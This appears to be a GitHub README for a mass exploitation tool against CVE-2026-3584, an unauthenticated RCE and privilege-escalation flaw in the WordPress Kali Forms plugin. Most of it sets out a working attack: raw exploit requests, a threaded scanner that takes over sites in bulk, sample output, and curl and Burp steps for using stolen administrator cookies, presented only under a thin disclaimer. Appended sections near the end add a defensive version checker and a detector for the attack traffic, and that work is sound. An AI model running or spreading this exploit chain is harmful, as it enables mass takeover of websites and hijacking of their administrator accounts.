Yucaerin/CVE-2026-3584

GitHub: Yucaerin/CVE-2026-3584

Mass scanning and exploitation tool for CVE-2026-3584 in the WordPress Kali Forms plugin, implementing the full attack chain from unauthenticated RCE to obtaining administrator privileges.

Stars: 0 | Forks: 1

# CVE-2026-3584 – WordPress Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process

🔥 **Vulnerability summary**

The WordPress plugin **Kali Forms** in versions <= 2.4.9 contains a critical **unauthenticated remote code execution (RCE)** vulnerability. The flaw allows an **unauthenticated attacker** to execute arbitrary PHP code on the server and obtain **full administrator privileges** through the publicly exposed AJAX endpoint `kaliforms_form_process`, which performs no authorization check.

The vulnerability lies in the `form_process` function, which accepts user-controlled parameters (including `thisPermalink` and `entryCounter`) and executes them as arbitrary PHP callbacks, leading to:

- **Remote code execution (RCE)** via `phpinfo()`, `system()`, `eval()` and similar
- **Privilege escalation** via `wp_set_auth_cookie()` to obtain an administrator session

## 🔍 **Affected plugin**

- **Plugin name:** Kali Forms – WordPress Form Builder
- **Affected versions:** <= 2.4.9
- **Vulnerability type:** Unauthenticated remote code execution + privilege escalation
- **CVE ID:** CVE-2026-3584
- **CVSS score:** 10.0 (Critical)
- **Impact:** Full site compromise, administrator access, persistence
- **Link:** https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process

## 🐛 **Vulnerability principle**

### **Technical analysis of the bug**

The vulnerability is in the `form_process` function that handles the plugin's AJAX requests. The vulnerable code is exposed as follows:

```
// AJAX endpoint reachable without authentication
add_action('wp_ajax_nopriv_kaliforms_form_process', array($this, 'form_process'));
```

**Exploitation flow:**

1. **Unprotected endpoint:** the endpoint `/wp-admin/admin-ajax.php?action=kaliforms_form_process` is reachable by unauthenticated users through the `wp_ajax_nopriv_` hook.
2. **User-controlled parameters:**
   - `data[thisPermalink]` - may contain an arbitrary PHP function name
   - `data[entryCounter]` - may contain an arbitrary PHP function name
   - `data[formId]` - ID of the form to process
3. **Unfiltered callback execution:** the vulnerable code executes the PHP callback without any validation:

   ```
   $callback = $_POST['data']['thisPermalink'];
   call_user_func($callback); // no check whatsoever!
   ```

4. **Exploit chain:**

   ```
   Attacker → POST request → kaliforms_form_process
       ↓
   thisPermalink=phpinfo → call_user_func('phpinfo')
       ↓
   PHP code execution → phpinfo() runs
       ↓
   entryCounter=wp_set_auth_cookie → administrator cookie generated
       ↓
   Full administrator access obtained
   ```

**Example vulnerable request:**

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[thisPermalink]=phpinfo&
data[email]=test@test.com
```

**Result:** the server executes `phpinfo()` and returns the full PHP configuration.

**For privilege escalation:**

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[entryCounter]=wp_set_auth_cookie&
data[email]=test@test.com
```

**Result:** WordPress executes `wp_set_auth_cookie(user_id)`, where `user_id` usually corresponds to `formId`, which yields a valid administrator session cookie.

## 🛠 **Mass Scanner - How it works**

### **Scanner architecture**

`mass_scanner.py` implements a 4-phase automated pipeline for full exploitation of CVE-2026-3584:

```
┌─────────────────────────────────────────────────────────────────┐
│                      MASS SCANNER PIPELINE                      │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│ Phase 1: REST API reconnaissance                                │
│   ├─ Enumerate users: /wp-json/wp/v2/users                      │
│   └─ Enumerate posts: /wp-json/wp/v2/posts                      │
│   → Identify user_id and post_id for escalation                 │
│                                                                 │
│ Phase 2: Form discovery                                         │
│   ├─ Crawl the site (depth=2)                                   │
│   ├─ Search for patterns: 'KaliFormsObject', 'kaliforms'        │
│   ├─ Extract nonce from JavaScript                              │
│   └─ Extract formId from HTML                                   │
│   → Find all vulnerable Kali Forms forms                        │
│                                                                 │
│ Phase 3: RCE test                                               │
│   ├─ Send: data[thisPermalink]=phpinfo                          │
│   ├─ Check: 'PHP Version' in response                           │
│   └─ Save: result/target_phpinfo.html                           │
│   → Confirms remote code execution                              │
│                                                                 │
│ Phase 4: Privilege escalation                                   │
│   ├─ Send: data[entryCounter]=wp_set_auth_cookie                │
│   ├─ Extract: wordpress_logged_in + wordpress_sec cookies       │
│   ├─ Check: access to /wp-admin/ without redirect               │
│   └─ Save: result_cookie/target.txt                             │
│   → Obtains full administrator access                           │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
```

### **Technical implementation details**

**1. Automatic URL normalization**

```
def normalize_url(self, target):
    # Automatically adds http:// or https://
    # Tries HTTPS first, then falls back to HTTP
    # Handles custom ports (e.g. :8080)
```

**2. REST API enumeration**

```
def enumerate_users_api(self, target):
    # GET /wp-json/wp/v2/users
    # Extracts all available user_id values
    # Used to map formId → user_id

def enumerate_posts_api(self, target):
    # GET /wp-json/wp/v2/posts
    # Extracts all available post_id values
    # Identifies user_id/post_id overlaps
```

**3. Form discovery (smart crawling)**

```
def discover_pages(self, target, max_depth=2):
    # Recursive crawl of the site
    # Searches for the JavaScript pattern 'KaliFormsObject'
    # Filters out unneeded URLs (js, css, images)
    # Follows internal links only
    # Returns the list of pages containing Kali Forms
```

**4. Form data extraction**

```
def extract_form_data(self, page_url):
    # Extracts the nonce from JavaScript:
    #   KaliFormsObject = { ajax_nonce: "abc123" }
    # Extracts the formId from HTML:
    #   data-id="1" or [kaliform id="1"]
    # If a nonce is found but no formId:
    #   brute-forces IDs 1-10
```

**5. RCE test**

```
def test_rce(self, target, form_id, nonce):
    # POST /wp-admin/admin-ajax.php
    # Payload: data[thisPermalink]=phpinfo
    # Check: len(response) > 10000 and 'PHP Version' present
    # Saves the full HTML for analysis
```

**6. Privilege escalation test**

```
def test_privilege_escalation_fast(self, target, nonce, user_ids, post_ids):
    # Smart strategy:
    #   1. Look for user_id/post_id overlaps
    #   2. Test the IDs with the highest success probability first
    #   3. Fall back to common IDs: 1,2,3,4,5
    # For each candidate formId:
    #   POST data[entryCounter]=wp_set_auth_cookie
    #   Extract cookies: wordpress_logged_in + wordpress_sec
    #   Check: GET /wp-admin/ → no redirect
    #   Check: 'dashboard' in response
```

**7. Multithreading**

```
# ThreadPoolExecutor for parallel processing
# Thread-safe locks for writing results
# Real-time saving (append mode)
# Global statistics with sync
```

**8. Automatic backup system**

```
def backup_previous_results(self):
    # Before each scan:
    #   result_phpinfo.txt → result_phpinfo.txt.20260325_120000.backup
    #   result/ → result.20260325_120000.backup/
    #   result_cookie/ → result_cookie.20260325_120000.backup/
    # Preserves all historical data
```

## 🚀 **Mass Scanner usage**

### **Requirements**

```
pip3 install requests beautifulsoup4
```

### **Preparing the target file**

Create a `targets.txt` file with one target per line (http/https optional):

```
example.com
wordpress.site
192.168.1.100
http://blog.example.org
https://secure.site.com:8080
```

### **Basic execution**

```
# Scan with default settings (20 threads)
python3 mass_scanner.py targets.txt

# Scan with a custom thread count
python3 mass_scanner.py -t 10 targets.txt

# Scan with the maximum thread count
python3 mass_scanner.py --threads 50 targets.txt
```

### **Scan output**

```
======================================================================
SCANNER DI MASSA - CVE-2026-3584 Pipeline Completa
======================================================================
Obiettivi: 100
Thread: 20
Pipeline: Ricognizione → Scoperta Moduli → RCE → Escalation Privilegi
======================================================================

[*] Risultati precedenti salvati in: result_phpinfo.txt.20260325_120000.backup

[04:38:28] [INFO] https://target1.com: Avvio scansione...
[04:38:28] [INFO] https://target1.com: Fase 1: Enumerazione API REST...
[04:38:29] [INFO] https://target1.com: Trovati 3 utenti via API
[04:38:29] [INFO] https://target1.com: Trovati 5 post via API
[04:38:29] [INFO] https://target1.com: Fase 2: Scoperta moduli...
[04:38:31] [INFO] https://target1.com: Trovate 8 pagine con moduli
[04:38:31] [INFO] https://target1.com: Fase 3: Test RCE...
[04:38:31] [INFO] https://target1.com: Test modulo/i [1, 2, 3] con nonce 46aedbd3...
[04:38:32] [SUCCESS] https://target1.com: RCE SUCCESSO sul modulo 1!
[04:38:32] [INFO] https://target1.com: Salvato phpinfo in result/target1.com_form1_phpinfo.html
[04:38:32] [INFO] https://target1.com: Fase 4: Test escalation privilegi...
[04:38:33] [CRITICAL] https://target1.com: ESCALATION PRIVILEGI RIUSCITA con formId=1!
[04:38:33] [INFO] https://target1.com: Cookie salvato in result_cookie/target1.com.txt

[04:38:35] [INFO] https://target2.com: Avvio scansione...
[04:38:36] [INFO] https://target2.com: Fase 1: Enumerazione API REST...
[04:38:37] [WARN] https://target2.com: Nessun Kali Forms trovato

...

======================================================================
STATISTICHE SCANSIONE
======================================================================
Obiettivi totali: 100
Scansionati: 100
Vulnerabili: 45
  - Solo RCE: 10
  - Escalation Priv (CVSS10): 35
Falliti: 55
======================================================================
Risultati salvati:
  - result_phpinfo.txt (RCE riuscito)
  - result_yes_all.txt (RCE + Escalation Privilegi)
  - result/*.html (Output phpinfo)
  - result_cookie/*.txt (Richieste HTTP con cookie amministrativi)
======================================================================
```

### **Log level meanings**

- **[INFO]** - general scan progress information
- **[SUCCESS]** - RCE confirmed, code execution succeeded
- **[CRITICAL]** - privilege escalation succeeded, administrator access obtained
- **[WARN]** - target not vulnerable or no forms found
- **[ERROR]** - error during the scan (timeout, connection, etc.)

### **Result structure**

```
/root/
├── result_phpinfo.txt        # List of targets with confirmed RCE
├── result_yes_all.txt        # List of targets with full admin access
├── result/                   # Detailed phpinfo HTML files
│   ├── target1.com_form1_phpinfo.html
│   ├── target2.org_form2_phpinfo.html
│   └── ...
└── result_cookie/            # HTTP requests with administrator cookies
    ├── target1.com.txt
    ├── target2.org.txt
    └── ...
```

### **result_phpinfo.txt format**

```
https://target1.com | Modulo: https://target1.com/contact | ID Modulo: 1 | Nonce: 46aedbd358 | File: result/target1.com_form1_phpinfo.html
https://target2.org | Modulo: https://target2.org/form | ID Modulo: 2 | Nonce: abc123def4 | File: result/target2.org_form2_phpinfo.html
```

### **result_yes_all.txt format**

```
======================================================================
OBIETTIVO: https://target1.com
TIMESTAMP: 2026-03-25T04:38:33.123456
======================================================================
RCE: SUCCESSO
  URL Modulo: https://target1.com/contact
  ID Modulo: 1
  Nonce: 46aedbd358
  phpinfo: result/target1.com_form1_phpinfo.html

ESCALATION PRIVILEGI: SUCCESSO (CVSS 10.0)
  Exploit formId: 1
  Cookie: wordpress_logged_in_xxx=...; wordpress_sec_xxx=...
  File Cookie: result_cookie/target1.com.txt
  Impatto: Accesso amministrativo completo

COMANDI DI SFRUTTAMENTO:
  Test RCE:
    python3 baru_cve_nih.py https://target1.com/contact 1 46aedbd358
  Escalation Privilegi:
    python3 POC_privilege_escalation_v3.py https://target1.com 46aedbd358
======================================================================
```

### **result_cookie/target.txt format**

```
GET /wp-admin/ HTTP/1.1
Host: target.com
Cookie: wordpress_logged_in_xxx=admin%7C1774600707%7C...; wordpress_sec_xxx=admin%7C1774600707%7C...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
```

This format can be pasted directly into Burp Suite Repeater or used with curl.

### **Using the administrator cookie**

**Method 1: test with curl**

```
# Extract the cookie from the file
COOKIE=$(grep "^Cookie:" result_cookie/target.com.txt | sed 's/^Cookie: //')

# Test administrator access
curl -H "Cookie: $COOKIE" https://target.com/wp-admin/ | grep -i dashboard

# If the output contains "Dashboard" → the cookie is valid!
```

**Method 2: use in Burp Suite**

```
# Step 1: generate the automatic configuration (optional)
./burp_config_gen.sh result_cookie/target.com.txt

# Step 2: Burp Suite → Proxy → Options → Match and Replace → Add

# Step 3: configure:
  Type: Request header
  Match: ^Cookie:.*$
  Replace: Cookie: [PASTE_COOKIE_FROM_FILE]
  ☑ Regex match

# Step 4: enable the rule (checkbox)

# Step 5: visit https://target.com/wp-admin/
# Result: immediate administrator access
```

### **Real-time monitoring**

During a scan, results can be monitored in real time:

```
# Terminal 1: run the scanner
python3 mass_scanner.py targets.txt

# Terminal 2: monitor RCE results
watch -n 2 'tail -20 result_phpinfo.txt'

# Terminal 3: monitor privilege escalation
watch -n 2 'tail -20 result_yes_all.txt'

# Terminal 4: count vulnerable targets
watch -n 5 'echo "RCE: $(wc -l < result_phpinfo.txt) | Admin: $(grep -c "ESCALATION PRIVILEGI: SUCCESSO" result_yes_all.txt)"'
```

### **Automatic backup**

Before each new scan, the scanner automatically backs up the previous results:

```
Scan 1: [12:00]
  result_phpinfo.txt
  result_yes_all.txt
  result/
  result_cookie/

Scan 2: [13:00] - automatic backup!
  [*] Risultati precedenti salvati in: result_phpinfo.txt.20260325_120000.backup
  [*] Risultati precedenti salvati in: result_yes_all.txt.20260325_120000.backup
  [*] File phpinfo precedenti salvati in: result.20260325_120000.backup/
  [*] File cookie precedenti salvati in: result_cookie.20260325_120000.backup/

All previous data is preserved with a timestamp!
```

### **Performance tuning**

**Recommended thread counts:**

```
# Fast network, many targets
python3 mass_scanner.py -t 50 targets.txt

# Medium network, medium number of targets
python3 mass_scanner.py -t 20 targets.txt  # (default)

# Slow network or few targets
python3 mass_scanner.py -t 10 targets.txt

# Single test (debug)
python3 mass_scanner.py -t 1 targets.txt
```

**Expected performance:**

- **20 threads:** ~500-1000 targets/hour (depends on the network)
- **50 threads:** ~1000-2000 targets/hour (higher timeout risk)
- **10 threads:** ~300-500 targets/hour (more stable)

### **Troubleshooting**

**Problem: no vulnerable targets found**

```
# Manually verify whether the site uses Kali Forms
curl -s https://target.com | grep -i "kaliforms"

# If found, extract the nonce manually
curl -s https://target.com | grep -i "KaliFormsObject"
```

**Problem: frequent timeouts**

```
# Reduce the thread count
python3 mass_scanner.py -t 5 targets.txt

# Or increase the timeout by editing the code (timeout=10 → timeout=30)
```

**Problem: cookie not valid**

```
# Verify the cookie's validity
bash test_burp_persistent.sh http://target.com

# If it fails, regenerate the cookie with:
python3 get_fresh_admin_cookie.py http://target.com [NONCE]
```

## 🔒 **Legal notice**

**⚠️ Important:** this information and these tools are **for authorized security testing and educational purposes only**.

- ✅ **Legal use:** authorized penetration testing, security research, training
- ❌ **Illegal use:** unauthorized access to systems, intrusion into websites without permission

**Unauthorized access to or use of computer systems is illegal and unethical.** The authors and contributors of this repository are not responsible for any damage caused by misuse of these tools. Users are responsible for ensuring they have proper authorization before testing any system.

**Use responsibly, and only with explicit written authorization.**

## 📚 **References**

**CVE and advisories:**

- CVE-2026-3584: Kali Forms RCE and privilege escalation
  - Link: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
  - CVSS score: 10.0 (Critical)
  - CWE-94: Improper Control of Generation of Code ('Code Injection')
  - CWE-862: Missing Authorization

**Affected plugin:**

- Name: Kali Forms – WordPress Form Builder
- Slug: kaliforms
- Repository: https://wordpress.org/plugins/kaliforms/
- Affected versions: <= 2.4.9

**CVE-2026-3584 | Kali Forms <= 2.4.9 | CVSS 10.0 Critical**

*Security research | Responsible exploitation | Cybersecurity education*
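The affected-version range from the advisory (Kali Forms <= 2.4.9) is the first thing a site owner needs to check. The following is an added example written for this page, not code from this repository or from the plugin: it reads the version from the standard WordPress `readme.txt` `Stable tag:` field or a plugin header `Version:` field, compares it against 2.4.9 with component-wise (zero-padded) comparison, and reports whether the install is in the affected range. The sample readme contents are constructed; the advice string is the editor's wording, not the vendor's.

```python
"""Exposure check for CVE-2026-3584 by plugin version (added example, not part of the repository)."""
import re

PLUGIN_SLUG = "kaliforms"      # from the references section of this page
LAST_AFFECTED = (2, 4, 9)      # advisory: Kali Forms <= 2.4.9 is affected

# Matches the WordPress readme.txt "Stable tag:" field or the plugin header "Version:" field,
# optionally prefixed by the " * " of a PHP doc-comment header.
VERSION_FIELD = re.compile(
    r"^\s*\*?\s*(?:Stable tag|Version)\s*:\s*v?(\d+(?:\.\d+)*)\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def parse_version(text):
    """Return the first version found as a tuple of ints, or None (e.g. 'Stable tag: trunk')."""
    m = VERSION_FIELD.search(text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def _pad(parts, n):
    """Right-pad a version tuple with zeros so '2.4' compares as (2, 4, 0)."""
    return tuple(parts) + (0,) * (n - len(parts))


def is_affected(version):
    """True when a dotted version string falls inside the advisory's affected range (<= 2.4.9)."""
    parsed = tuple(int(p) for p in version.split("."))
    n = max(len(parsed), len(LAST_AFFECTED))
    return _pad(parsed, n) <= _pad(LAST_AFFECTED, n)


def assess(readme_text):
    """Turn readme/plugin-header text into a small assessment record."""
    version = parse_version(readme_text)
    if version is None:
        return {"plugin": PLUGIN_SLUG, "version": None, "affected": None,
                "action": "version unknown; check the installed plugin manually"}
    dotted = ".".join(map(str, version))
    affected = is_affected(dotted)
    return {"plugin": PLUGIN_SLUG, "version": dotted, "affected": affected,
            "action": "update Kali Forms to a version above 2.4.9" if affected
            else "not in the affected range"}


# Constructed sample of a readme.txt header (illustrative, not the real file).
SAMPLE_README = """=== Kali Forms – WordPress Form Builder ===
Stable tag: 2.4.9
"""

if __name__ == "__main__":
    print(assess(SAMPLE_README))
```

Point `assess()` at the contents of `wp-content/plugins/kaliforms/readme.txt` on the server (or the plugin's main PHP file header); a `Stable tag: trunk` or missing field returns `affected: None` rather than a guess.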
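The request shape in the vulnerability section (a `kaliforms_form_process` POST whose `data[thisPermalink]` or `data[entryCounter]` carries a PHP function name instead of a page URL or a number) and the scanner pipeline above (REST user/post enumeration immediately followed by those POSTs) give a defender a concrete signature. The following is an added detection example written for this page, not code from this repository or the plugin: it runs over constructed request events in the shape a WAF or reverse proxy that logs POST bodies would record (timestamp, client IP, method, path, body), flags callback parameters that do not look like legitimate input, raises severity for the callback names this page documents, and marks whether the same client performed REST API enumeration shortly before. Event shape, IPs and timestamps are constructed assumptions.

```python
"""Detection of CVE-2026-3584 exploitation attempts (added example, not part of the repository)."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

AJAX_ACTION = "kaliforms_form_process"

# Parameters the page names as reaching call_user_func(), with the value a legitimate client sends:
# thisPermalink is the URL of the page hosting the form, entryCounter is a numeric counter.
CALLBACK_PARAMS = {"data[thisPermalink]": "url", "data[entryCounter]": "int"}

# Callback names this page documents in the exploit chain; any other value that looks like a
# PHP callable is still flagged, one severity level lower.
KNOWN_BAD_CALLBACKS = {"phpinfo", "system", "eval", "wp_set_auth_cookie"}

# A bare PHP function name or Class::method, the string forms call_user_func() accepts.
PHP_CALLABLE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(::[A-Za-z_][A-Za-z0-9_]*)?$")


def flatten_form_body(body):
    """Parse an application/x-www-form-urlencoded body into {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def callback_findings(params):
    """Return [(param, value, severity)] for callback parameters that do not look like legitimate input."""
    findings = []
    if params.get("action") != AJAX_ACTION:
        return findings
    for name, expected in CALLBACK_PARAMS.items():
        value = params.get(name)
        if value is None:
            continue
        if expected == "int" and value.isdigit():
            continue                                   # a real entry counter
        if expected == "url" and value.startswith(("http://", "https://", "/")):
            continue                                   # a real permalink
        if PHP_CALLABLE.match(value):
            severity = "critical" if value in KNOWN_BAD_CALLBACKS else "high"
            findings.append((name, value, severity))
    return findings


def scan_events(events, recon_window=timedelta(minutes=10)):
    """Flag admin-ajax.php POSTs carrying callback names; note prior REST API enumeration by the same IP."""
    last_recon = {}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["method"] == "GET" and ev["path"].startswith("/wp-json/wp/v2/"):
            last_recon[ev["ip"]] = ev["ts"]            # phase 1 of the scanner pipeline
            continue
        if ev["method"] != "POST" or not ev["path"].startswith("/wp-admin/admin-ajax.php"):
            continue
        findings = callback_findings(flatten_form_body(ev["body"]))
        if not findings:
            continue
        seen = last_recon.get(ev["ip"])
        alerts.append({
            "ip": ev["ip"],
            "ts": ev["ts"],
            "findings": findings,
            "severity": "critical" if any(f[2] == "critical" for f in findings) else "high",
            "recon_seen": seen is not None and ev["ts"] - seen <= recon_window,
        })
    return alerts


# Constructed sample traffic: one client following the scanner pipeline, one legitimate submission.
RCE_BODY = ("action=kaliforms_form_process&data[formId]=1&data[nonce]=abc123"
            "&data[thisPermalink]=phpinfo&data[email]=test@test.com")
PRIVESC_BODY = ("action=kaliforms_form_process&data[formId]=1&data[nonce]=abc123"
                "&data[entryCounter]=wp_set_auth_cookie&data[email]=test@test.com")
BENIGN_BODY = ("action=kaliforms_form_process&data[formId]=1&data[nonce]=abc123"
               "&data[thisPermalink]=https://example.com/contact/&data[entryCounter]=0"
               "&data[email]=test@test.com")


def _t(hhmmss):
    return datetime(2026, 3, 25, *map(int, hhmmss.split(":")))


SAMPLE_EVENTS = [
    {"ts": _t("04:38:28"), "ip": "10.0.0.5", "method": "GET", "path": "/wp-json/wp/v2/users", "body": ""},
    {"ts": _t("04:38:29"), "ip": "10.0.0.5", "method": "GET", "path": "/wp-json/wp/v2/posts", "body": ""},
    {"ts": _t("04:38:31"), "ip": "10.0.0.5", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": RCE_BODY},
    {"ts": _t("04:38:33"), "ip": "10.0.0.5", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": PRIVESC_BODY},
    {"ts": _t("04:40:00"), "ip": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": BENIGN_BODY},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["ts"].time(), alert["ip"], alert["severity"], alert["findings"],
              "recon_seen=%s" % alert["recon_seen"])
```

The value-shape rule (a callable-looking string where a URL or integer belongs) is what catches variants not on the known-bad list; the `recon_seen` flag separates a one-off probe from a client running the full four-phase pipeline.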